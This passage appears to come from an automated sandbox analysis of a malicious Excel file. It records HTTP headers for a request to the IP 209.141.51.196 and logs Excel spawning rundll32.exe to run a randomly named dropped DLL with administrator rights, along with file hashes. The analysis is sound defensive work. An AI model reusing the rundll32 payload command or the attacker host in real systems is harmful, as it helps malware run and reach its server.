                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 209.141.51.196
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 20, 2021 19:13:42.811311007 CET239INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Wed, 20 Jan 2021 18:13:42 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                  Expires: 0
                                                                                                                                                  Last-Modified: Wed, 20 Jan 2021 18:13:42 GMT
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Set-Cookie: _subid=1btl9dh6o2;Expires=Saturday, 20-Feb-2021 18:13:42 GMT;Max-Age=2678400;Path=/
                                                                                                                                                  Set-Cookie: c57e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjRcIjoxNjExMTY2NDIyfSxcImNhbXBhaWduc1wiOntcIjFcIjoxNjExMTY2NDIyfSxcInRpbWVcIjoxNjExMTY2NDIyfSJ9.d1BAgAdzqK6yWItY7wGFXevPiuWFlgAw2eLbXym_MdY;Expires=Saturday, 20-Feb-2021 18:13:42 GMT;Max-Age=2678400;Path=/
                                                                                                                                                  Vary: Accept-Encoding


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:19:13:37
                                                                                                                                                  Start date:20/01/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0xe40000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:19:13:41
                                                                                                                                                  Start date:20/01/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Windows\System32\rundll32.exe' C:\YvfpvrE\UVqsCZG\zSdSPJb.dll,DllRegisterServer
                                                                                                                                                  Imagebase:0xa70000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >